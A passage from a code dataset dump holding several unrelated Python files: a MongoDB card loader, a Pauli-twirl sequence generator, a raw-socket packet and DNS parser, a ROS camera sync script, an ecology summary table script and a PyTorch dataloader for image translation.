"github-code", "pt": "31", "api": [{"api_name": "dymos.examples.racecar.tracks.ovaltrack", "line_number": 14, "usage_type": "name"}, {"api_name": "dymos.examples.racecar.spline.get_track_points", "line_number": 18, "usage_type": "call"}, {"api_name": "dymos.examples.racecar.spline.get_spline", "line_number": 21, "usage_type": "call"}, {"api_name": "openmdao.api.Problem", "line_number": 27, "usage_type": "call"}, {"api_name": "openmdao.api", "line_number": 27, "usage_type": "name"}, {"api_name": "openmdao.api.Group", "line_number": 27, "usage_type": "call"}, {"api_name": "dymos.Trajectory", "line_number": 30, "usage_type": "call"}, {"api_name": "dymos.Phase", "line_number": 34, "usage_type": "call"}, {"api_name": "dymos.examples.racecar.combinedODE.CombinedODE", "line_number": 35, "usage_type": "name"}, {"api_name": "dymos.GaussLobatto", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 184, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 185, "usage_type": "attribute"}, {"api_name": "paropt.paropt_sparse_driver.ParOptSparseDriver", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 375, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 375, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 376, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}]}
+{"seq_id": "43093494100", "text": "import pymongo\nimport json\nfrom getCardSet import get_setids, default_setids_path\n\nport = 27017\nusername = None\npassword = None\nclient = pymongo.MongoClient(host='localhost', port=27017)\ndb = client['artifact']\n\n\ndef load_cardset(setid):\n with open('save/' + setid + '.json') as f:\n cardset = json.load(f)\n return cardset\n\n\ndef extract_cardset_info(cardset_json):\n cardset_info = cardset_json['set_info']\n set_id = cardset_info['set_id']\n set_name = cardset_info['name']['english']\n return set_id, set_name\n\n\nsetids = get_setids(default_setids_path)\nfor set_id in setids:\n cardset = load_cardset(set_id)['card_set']\n set_id, set_name = extract_cardset_info(cardset)\n collection = db[str(set_id)]\n card_list = cardset['card_list']\n for card in card_list:\n collection.insert_one(card)\n", "repo_name": "PlumPeanut/ArtifactCard-Python3", "sub_path": "dataBase.py", "file_name": "dataBase.py", "file_ext": "py", "file_size_in_byte": 834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "getCardSet.get_setids", "line_number": 25, "usage_type": "call"}, {"api_name": "getCardSet.default_setids_path", "line_number": 25, "usage_type": "argument"}]}
+{"seq_id": "72445389849", "text": "\"\"\"\n#Create set of pulses for single qubit randomized benchmarking sequence. \n\nCreated on Tue Feb 07 15:01:37 2012\n\n@authors: Colm Ryan and Marcus Silva\n\"\"\"\nimport numpy as np\nfrom functools import reduce\n\nimport csv\n\ndef memoize(function):\n\tcache = {}\n\tdef decorated(*args):\n\t\tif args not in cache:\n\t\t\tcache[args] = function(*args)\n\t\treturn cache[args]\n\treturn decorated\n\n@memoize\ndef pauli_multiply(P1, P2):\n '''\n Multiplication table for single qubit cliffords. Note this assumes C1 is applied first. \n '''\n tmpMult = np.dot(Paulis[P2].matrix,Paulis[P1].matrix)\n checkArray = np.array([np.abs(np.trace(np.dot(tmpMult.transpose().conj(),Paulis[x].matrix))) for x in range(1,5)])\n return checkArray.argmax()+1\n\n\n#Number of gates that we want\ngateLengths = np.array([2, 4, 8, 16, 32, 64, 96, 128, 192, 256, 320])\n\n#Number of randomizations\nnumRandomizations = 32\n\n#Single qubit paulis\nX = np.array([[0, 1],[1, 0]])\nY = np.array([[0, -1j],[1j, 0]])\nZ = np.array([[1, 0],[0, -1]]);\nI = np.eye(2)\n\n#Basically a structure to contain some infor about the Cliffords\nclass Pauli(object):\n def __init__(self, matrix, inverse):\n self.matrix = matrix\n self.inverse = inverse\n \n#Basis Cliffords\nPaulis = {}\nPaulis[1] = Pauli(I, 1)\nPaulis[2] = Pauli(X, 2)\nPaulis[3] = Pauli(Y, 3)\nPaulis[4] = Pauli(Z, 4)\n\ntargetGate = 1\n\n#Generate random sequence of Paulis for each number of gates we want to look at and repeat numRandomization times\nrandPauliLists = [np.random.randint(1,5, gatect-1).tolist() for gatect in gateLengths for randct in range(numRandomizations) ] \n\n#Interleave gate of interest\n#interLeavedGateLists = [np.vstack((tmpGateList, targetGate*np.ones_like(tmpGateList))).flatten(order='F').tolist() for tmpGateList in randPauliLists]\n \n#For each sequence calculate inverse and the X sequence and append the final Clifford\nrandomISeqs = []\n#randomXSeqs = []\nfor tmpPauliSeq in randPauliLists:\n totalPauli = reduce(pauli_multiply, tmpPauliSeq)\n inversePauli = Paulis[totalPauli].inverse\n# inverseCliffX = clifford_multiply(inverseCliff, 2)\n randomISeqs.append(tmpPauliSeq + [inversePauli])\n# randomXSeqs.append(tmpSeq + [inverseCliffX]) \n \n\n#Write out the files now\nwith open('PauliTwirl_ISeqs.txt','wt') as ISeqFID:\n writer = csv.writer(ISeqFID)\n writer.writerows(randomISeqs)\n\n#with open('PauliTwirl_XSeqs.txt','wt') as XSeqFID:\n# writer = csv.writer(XSeqFID)\n# writer.writerows(randomXSeqs)\n\n\n\n\n\n \n\n \n \n \n \n", "repo_name": "BBN-Q/Qlab", "sub_path": "experiments/muWaveDetection/sequences/CreatePauliTwirlSeq.py", "file_name": "CreatePauliTwirlSeq.py", "file_ext": "py", "file_size_in_byte": 2501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.dot", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.trace", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 68, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "14551109132", "text": "import socket, sys\nimport struct\nfrom struct import *\nfrom dnslib import DNSRecord\nimport binascii\nimport time\nimport pprint\n# import FilterAgent.network\nclass compiledPacket:\n \n def __init__(self):\n self.ips = []\n self.tcps = []\n self.dns = []\n \n def add(self,packettype,packet):\n if packettype == 'IP':\n self.ips.append(packet)\n elif packettype == 'TCP':\n self.tcps.append(packet)\n elif packettype == 'DNS' or packettype == 'UDP':\n self.dns.append(packet)\n else:\n raise error\n \nclass dataPacket:\n \n '''\n Data class that can be sent to the central\n '''\n def __init__(self,ipVersion,ipHLength,ttl,protocol,sourceAddr,destAddr,sourcePort,destPort,seqNum,Ack):\n self.ipVersion = ipVersion\n self.ipHLength = ipHLength\n self.ttl = ttl\n self.protocol = protocol\n self.sourceAddr= sourceAddr\n self.destAddr = destAddr\n self.sourcePort= sourcePort\n self.destPort = destPort\n self.seqNum = seqNum\n self.Ack = Ack\n\nclass udpPacket:\n '''\n UDP stored data\n '''\n def __init__(self,sourcePort,destPort,length,data):\n self.sourcePort = sourcePort\n self.destPort = destPort\n self.length = length\n self.data = data\n \ndef eth_addr (a) :\n\tb = \"%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\" % (ord(a[0]) , ord(a[1]) , ord(a[2]), ord(a[3]), ord(a[4]) , ord(a[5]))\n\treturn b\n\ndef decode_label(message, offset):\n\tlabels = []\n\t\t\t\n\twhile True:\n\t\tlength, = struct.unpack_from(\"!B\", message, offset)\n\t\t\n\t\tif(length & 0xC0) == 0xC0:\n\t\t\tpointer, = struct.unpack_from(\"!H\", message, offset)\n\t\t\toffset += 2\n\t\t\treturn labels + decode_label(message, pointer & 0x3FFF),offset\n\t\t\t\n\t\tif(length & 0xC0) != 0x00:\n\t\t\traise StandardError(\"Unknown labelencoding\")\n\t\t\t\n\t\toffset += 1\n\t\t\n\t\tif length == 0:\n\t\t\treturn labels, offset\n\t\t\n\t\tlabels.append(*struct.unpack_from(\"!%ds\" % length, offset))\n\t\toffset += length\n\nDNS_QUERY_SECTION_FORMAT = struct.Struct(\"!2H\")\n\ndef decode_question_section(message, offset, qdcount):\n\tquestions = []\n\tfor _ in range(qdcount):\n\t\tqname, offset = decode_label(message, offset)\n\t\t\n\t\tqtype, qclass = DNS_QUERY_SECTION_FORMAT.unpack_from(message,offset)\n\t\toffset += DNS_QUERY_SECTION_FORMAT.size\n\t\tprint(message)\n\t\tquestion = {\"domain_name\":qname,\n\t\t\t\t\t\"query_type\":qtype,\n\t\t\t\t\t\"query_class\":qclass}\n\t\t\t\t\t\n\t\tquestions.append(question)\n\treturn questions, offset\n\n\nDNS_QUERY_MESSAGE_HEADER = struct.Struct(\"!6H\")\n\t\ndef decode_dns_message(message):\n\t\n\tid, misc,qdcount,ancount,nscount,arcount = DNS_QUERY_MESSAGE_HEADER.unpack_from(message)\n\t\n\tqr = (misc & 0x8000) != 0\n\topcode = (misc & 0x7800) >> 11\n\taa = (misc & 0x0400) != 0\n\ttc = (misc & 0x200) != 0\n\trd = (misc & 0x100) != 0\n\tra = (misc & 0x80) != 0\n\tz = (misc & 0x70) != 0\n\trcode = misc & 0xF\n\t\n\toffset = DNS_QUERY_MESSAGE_HEADER.size\n\tquestions, offset = decode_question_section(message, offset, qdcount)\n\t\n\tresult = { \"id\": id,\n\t\t\t \"is_response\": qr,\n\t\t\t \"opcode\":opcode,\n\t\t\t \"is_authoritative\": aa,\n\t\t\t \"is_truncated\":tc,\n\t\t\t \"recursion_desired\":rd,\n\t\t\t \"recursion_available\":ra,\n\t\t\t \"reserved\":z,\n\t\t\t \"response_code\":rcode,\n\t\t\t \"question_count\":qdcount,\n\t\t\t \"answer_count\":ancount,\n\t\t\t \"authority_count\":nscount,\n\t\t\t \"additional_count\":arcount,\n\t\t\t \"questions\": questions}\n\treturn result\n\t\t\t\ndef sniff(duration=5): \n#create an INET, STREAMing socket\n try:\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))\n except socket.error as msg:\n print ('Socket could not be created. Error Code : ' + str(msg))\n sys.exit()\n \n cPacket = compiledPacket()\n # print(cPacket)\n start = time.time()\n print('start time = '+str(start))\n # packet = s.recvfrom(65565)\n # print(binascii.unhexlify(packet[0]))\n # receive a packet\n while True:\n 'started!'\n packet = s.recvfrom(65565)\n #packet string from tuple\n fullSocketReturn = packet\n packet = packet[0]\n try:\n d = DNSRecord.parse(packet)\n print(d)\n except struct.error as err:\n continue\n except RuntimeError as re:\n continue\n #parse ethernet header\n eth_length = 14\n eth_header = packet[:eth_length]\n eth = unpack('!6s6sH', eth_header)\n eth_protocol = socket.ntohs(eth[2])\n #print('Destination MAC' +eth_addr(packet[0:6])+' Source MAC '+eth_addr(packet[6:12])+' Protocol : '+str(eth_protocol))\n \n if eth_protocol == 8:\n \n ip_header = packet[eth_length:20+eth_length]\n \n #now unpack them :)\n iph = unpack('!BBHHHBBH4s4s' , ip_header)\n \n version_ihl = iph[0]\n version = version_ihl >> 4\n ihl = version_ihl & 0xF\n \n iph_length = ihl * 4\n \n ttl = iph[5]\n protocol = iph[6]\n s_addr = socket.inet_ntoa(iph[8]);\n d_addr = socket.inet_ntoa(iph[9]);\n \n #print ('IP Version : ' + str(version) + ' IP Header Length : ' + str(ihl) + ' TTL : ' + str(ttl) + ' Protocol : ' + str(protocol) + ' Source Address : ' + str(s_addr) + ' Destination Address : ' + str(d_addr))\n #print('\\n')\n if protocol == 6: \n tcp_header = packet[iph_length:iph_length+20]\n \n #now unpack them :)\n tcph = unpack('!HHLLBBHHH' , tcp_header)\n \n source_port = tcph[0]\n dest_port = tcph[1]\n sequence = tcph[2]\n acknowledgement = tcph[3]\n doff_reserved = tcph[4]\n tcph_length = doff_reserved >> 4\n \n #print ('TCP PACKET ::: Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Sequence Number : ' + str(sequence) + ' Acknowledgement : ' + str(acknowledgement) + ' TCP header length : ' + str(tcph_length))\n \n h_size = iph_length + tcph_length * 4\n data_size = len(packet) - h_size\n \n #get data from the packet\n data = str(packet[h_size:])\n packet = dataPacket(str(version),str(ihl),str(ttl),str(protocol),str(s_addr),\n str(d_addr),str(source_port),str(dest_port),str(sequence),str(acknowledgement));\n cPacket.add('TCP', packet)\n if protocol == 17:\n u = iph_length + eth_length\n udph_length = 8\n udph_header = packet[u:u+8]\n udph = unpack('!HHHH',udph_header)\t\t\t\t\n sourcePort = udph[0]\n destPort = udph[1]\n length = udph[2]\n checksum = udph[3]\n # print(udph)\n h_size = eth_length + iph_length + udph_length\n data_size = len(packet) - h_size\n print ('UDP PACKET ::: Source Port : ' + str(sourcePort) + ' Dest Port : ' + str(destPort) + ' Length : ' \n + str(length) + ' Checksum : ' + str(checksum)+' Data size :'+str(data_size))\n print()\n # print(packet[h_size:])\n #get data from the packet\n data = packet[h_size:]\n # print ('UDP DATA ENCODED\\n')\n # print(type(data))\n # print(repr(data))\n \n try:\n # print(data.decode('ascii'))\n # d = DNSRecord.parse(packet)\n # print(d)\n pprint.pprint(decode_dns_message(packet))\n except UnicodeDecodeError as err:\n # print(err)\n continue\n except binascii.Error as baerr:\n # print(baerr)\n continue\n except struct.error as strerr:\n # print(strerr)\n continue\n except TypeError as te:\n # print(te)\n continue\n except RuntimeError as re:\n continue\n packet = udpPacket(sourcePort, destPort, length, data)\n cPacket.add('UDP', packet)\n #return packet \n #print ('Data : ' + data)\n return cPacket\n # printw\n\ntry:\n\tpacket = sniff(0)\nexcept KeyboardInterrupt as ki:\n print('Exiting sniffer! Collected data :: \\n')\n print(packet)\n sys.exit()", "repo_name": "hugokuijzer/Uxx", "sub_path": "FilterAgent/ltcp.py", "file_name": "ltcp.py", "file_ext": "py", "file_size_in_byte": 8652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "struct.unpack_from", "line_number": 61, "usage_type": "call"}, {"api_name": "struct.unpack_from", "line_number": 64, "usage_type": "call"}, {"api_name": "struct.unpack_from", "line_number": 76, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 79, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 97, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 134, "usage_type": "call"}, {"api_name": "socket.AF_PACKET", "line_number": 134, "usage_type": "attribute"}, {"api_name": "socket.SOCK_RAW", "line_number": 134, "usage_type": "attribute"}, {"api_name": "socket.ntohs", "line_number": 134, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 135, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 137, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "dnslib.DNSRecord.parse", "line_number": 153, "usage_type": "call"}, {"api_name": "dnslib.DNSRecord", "line_number": 153, "usage_type": "name"}, {"api_name": "struct.error", "line_number": 155, "usage_type": "attribute"}, {"api_name": "socket.ntohs", "line_number": 163, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 181, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 182, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 235, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 239, "usage_type": "attribute"}, {"api_name": "struct.error", "line_number": 242, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 262, "usage_type": "call"}]}
+{"seq_id": "71542508888", "text": "'''\n @Author: JoeyforJoy & ylheng\n @Date: 2022-03-25 15:10:15\n @LastEditTime: 2022-03-29 11:13:51\n @LastEditors: JoeyforJoy\n @Description: Transfer rosbag to synchronized image and pcd files.\n @Example: \n # message should be broadcast first\n rosrun b2x time_sync_cam2.py ${img1_topic} ${img2_topic} --output_dir ${output_dir}\n'''\n\nimport numpy as np\nimport rospy\nimport message_filters\nfrom sensor_msgs.msg import Image, CompressedImage\n\nimport os\nimport sys\nPARENT_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"..\")\nsys.path.append(PARENT_DIR)\nfrom utils import *\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Transfer rosbag to synchronized image and pcd files.\")\n parser.add_argument(\"topic_img1\", type=str, help = \"the name of the image1 topic\")\n parser.add_argument(\"topic_img2\", type=str, help = \"the name of the image2 topic\")\n parser.add_argument(\"--output_dir\", type=str, default=\"./data/synchronized\", \n help = \"the root directory of the output files\")\n parser.add_argument(\"--img1_dir_label\", type=str, default=\"image1\", \n help = \"the subdirectory name of output images\")\n parser.add_argument(\"--img2_dir_label\", type=str, default=\"image2\", \n help = \"the subdirectory name of output images\")\n parser.add_argument(\"--tot\", type=float, default=0.01, \n help = \"the tolerence of time synchronization\")\n return parser.parse_args()\n\nclass callBackClass:\n def __init__(self, output_dir, img1_subdir=\"image1\", img2_subdir=\"image2\",\n img1_compressed = True, img2_compressed = True):\n self.output_dir = output_dir\n self.img1_dir = os.path.join(self.output_dir, img1_subdir)\n self.img2_dir = os.path.join(self.output_dir, img2_subdir)\n \n os.makedirs(self.output_dir, exist_ok=True)\n os.makedirs(self.img1_dir, exist_ok=True)\n os.makedirs(self.img2_dir, exist_ok=True)\n \n self.img1_compressed = img1_compressed\n self.img2_compressed = img2_compressed\n\n self.count = 0\n self.max_count = 1000000\n\n def __call__(self, img1_msg, img2_msg):\n frame_name = \"%06d\" % (self.count)\n # print(\"frame name: %s\\ttimestampe: %s\" % (frame_name, img1_msg.header.stamp))\n\n # transfer img1 msg 2 cv img\n dumpImageMsg(img1_msg, self.img1_dir, frame_name, compressed = self.img1_compressed)\n dumpImageMsg(img2_msg, self.img2_dir, frame_name, compressed = self.img2_compressed)\n\n self.count = (self.count + 1) % self.max_count\n\nif __name__ == \"__main__\":\n rospy.init_node('time_sync_lidar_cam')\n\n args = parse_args()\n\n image1_sub = createImgMsgFilterSubsciber(args.topic_img1)\n image2_sub = createImgMsgFilterSubsciber(args.topic_img2)\n ts = message_filters.ApproximateTimeSynchronizer([image1_sub, image2_sub], 10, args.tot, allow_headerless=True)\n\n img1_compressed = isCompressedImage(args.topic_img1)\n img2_compressed = isCompressedImage(args.topic_img2)\n callback = callBackClass(args.output_dir, img1_compressed = img1_compressed, img2_compressed = img2_compressed)\n ts.registerCallback(callback)\n rospy.spin()\n", "repo_name": "YuanxianH/b2x", "sub_path": "src/b2x/scripts/time_sync_cam2.py", "file_name": "time_sync_cam2.py", "file_ext": "py", "file_size_in_byte": 3254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 45, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 47, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 66, "usage_type": "call"}, {"api_name": "message_filters.ApproximateTimeSynchronizer", "line_number": 72, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "15175318169", "text": "import numpy as np\nimport pandas as pd\nfrom scipy.special import comb\n\nfrom LV_real_multispec_com import LV_pars, max_spec, LV_multi_spec\n\n# simple summary for number of communities\nn_specs = np.arange(2,7)\ncom_sum = pd.DataFrame()\n# distinct communities from papers\ndist_com = [sum(LV_multi_spec.n_spec == i) for i in range(max_spec+1)]\ncom_sum[\"dist_com\"] = dist_com\n# maximal number of communities\ncom_sum[\"max_com\"] = [int(sum(dist_com * comb(np.arange(0,max_spec +1),i)))\n for i in range(0,max_spec+1)]\n# communities for which all parameters exist and are nonzero\ncom_sum[\"full_com\"] = [len(mat) for mat in LV_pars[\"matrix\"]]\n# communities for which we can compute NFD parameters\n[sum(comp) for comp in LV_pars[\"NFD_comp\"]]\ncom_sum[\"NFD_comp\"] = [len(ND) for ND in LV_pars[\"ND\"]]\n# communities with stable equilibrium\ncom_sum[\"coex\"] = [sum(coex) for coex in LV_pars[\"real_coex\"]]\ncom_sum[\"no_coex\"] = com_sum[\"full_com\"]-com_sum[\"coex\"]\n\n\n\n# number of communities, for which invasion is not possible, or does not\n# predict coexistnece, but can coexist\ncoex_real = LV_pars[\"real_coex\"]\nNFD_comp = LV_pars[\"NFD_comp\"]\ncoex_invasion = LV_pars[\"coex_invasion\"]\n\n\ncoex_no_inv = [coex_real[i] & (~NFD_comp[i]) for i in n_specs]\ninv_wrong = [coex_real[i][NFD_comp[i]] != coex_invasion[i] for i in n_specs]\ncom_sum[\"no_inv\"] = 0\ncom_sum[\"no_inv\"].iloc[n_specs] = [sum(c) for c in coex_no_inv]\ncom_sum[\"inv_wrong\"] = 0\ncom_sum[\"inv_wrong\"].iloc[n_specs] = [sum(c) for c in inv_wrong]\ncom_sum[\"NFD_coex\"] = com_sum[\"coex\"]-com_sum[\"no_inv\"]\ncom_sum[\"NFD_no_coex\"] = com_sum[\"NFD_comp\"] -com_sum[\"NFD_coex\"]\ncom_sum = com_sum.T\n\ncom_sum[\"total\"] = np.sum(com_sum.values, axis = 1)\nprint(com_sum)\ncom_sum.index = [\"Original matrices\", \"Subcommunities\",\n \"Complete\\n int. matrix\", \"NFD computed\", \"coexistence\",\n \"comp. exclusion\", \"no invasion analysis\", \"invasion wrong\",\n \"NFD coexistence\", \"NFD comp. excl\"]\ndel(com_sum[0])\ndel(com_sum[1])\ncom_sum.to_csv(\"Table_S2.csv\", index = True) \n", "repo_name": "juergspaak/multi_species_NFD", "sub_path": "Table_S2.py", "file_name": "Table_S2.py", "file_ext": "py", "file_size_in_byte": 2040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "call"}, {"api_name": "LV_real_multispec_com.LV_multi_spec.n_spec", "line_number": 11, "usage_type": "attribute"}, {"api_name": "LV_real_multispec_com.LV_multi_spec", "line_number": 11, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.max_spec", "line_number": 11, "usage_type": "name"}, {"api_name": "scipy.special.comb", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 14, "usage_type": "call"}, {"api_name": "LV_real_multispec_com.max_spec", "line_number": 14, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.max_spec", "line_number": 15, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 17, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 19, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 20, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 22, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 29, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 30, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "9220276953", "text": "import os\r\nimport random\r\nfrom PIL import Image\r\n\r\nfrom torch.utils import data\r\n\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\n\r\ndef create_dataloader(dataset='cifar10', batch_size=64, num_workers=1):\r\n if dataset == 'cifar10':\r\n transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n\r\n trainset = torchvision.datasets.CIFAR10(root='./data/', train=True, transform=transform, download=True)\r\n testset = torchvision.datasets.CIFAR10(root='./data/', train=False, transform=transform, download=True)\r\n\r\n trainloader = data.DataLoader(dataset=trainset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n testloader = data.DataLoader(dataset=testset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\r\n\r\n elif dataset == 'summer2winter':\r\n transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n\r\n trainset = Summer2WinterDataset(train=True, transform=transform)\r\n testset = Summer2WinterDataset(train=False, transform=transform)\r\n\r\n trainloader = data.DataLoader(dataset=trainset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n testloader = data.DataLoader(dataset=testset, batch_size=1, shuffle=False, num_workers=num_workers)\r\n\r\n return trainloader, testloader\r\n\r\n\r\nclass Summer2WinterDataset(data.Dataset):\r\n def __init__(self, train: bool=True, transform=None):\r\n self.transform = transform\r\n dataset_dir = './data/summer2winter_yosemite/'\r\n\r\n # Implement the dataset for unpaired image-to-image translation.\r\n # Check the dataset directory and implement the proper dataset.\r\n # This dataset have to load the train or test files depending on the 'train' option.\r\n\r\n ### YOUR CODE HERE (~ 10 lines)\r\n self.train =train\r\n if self.train:\r\n self.image_list_A = os.listdir(dataset_dir+'trainA')\r\n self.folderA = dataset_dir +'trainA'\r\n self.image_list_B = os.listdir(dataset_dir + 'trainB')\r\n self.folderB = dataset_dir + 'trainB'\r\n else:\r\n self.image_list_A = os.listdir(dataset_dir + 'testA')\r\n self.folderA = dataset_dir + 'testA'\r\n self.image_list_B = os.listdir(dataset_dir + 'testB')\r\n self.folderB = dataset_dir + 'testB'\r\n\r\n self.image_list_A.sort()\r\n self.image_list_B.sort()\r\n self.transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n ### END YOUR CODE\r\n\r\n def __getitem__(self, index):\r\n\r\n # The number of images in domain A and domain B are different.\r\n # You have to sample the index to load data from different pairs.\r\n\r\n ### YOUR CODE HERE (~ 2 lines)\r\n image_A= Image.open(os.path.join(self.folderA, self.image_list_A[index]))\r\n image_B = Image.open(os.path.join(self.folderB, self.image_list_B[random.randint(0,len(self.image_list_B)-1)]))\r\n\r\n ### END YOUR CODE\r\n\r\n return self.transform(image_A), self.transform(image_B)\r\n\r\n def __len__(self):\r\n return len(self.image_list_A)\r\n\r\n\r\nclass FolderDataset(data.Dataset):\r\n def __init__(self, folder):\r\n self.folder = folder\r\n self.image_list = os.listdir(folder)\r\n self.transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n\r\n def __getitem__(self, index):\r\n image = Image.open(os.path.join(self.folder, self.image_list[index]))\r\n return self.transform(image)\r\n\r\n def __len__(self):\r\n return len(self.image_list)\r\n", "repo_name": "thanhkaist/GAN", "sub_path": "dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 3959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 14, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 14, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 16, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 20, "usage_type": "call"}, {"api_name": 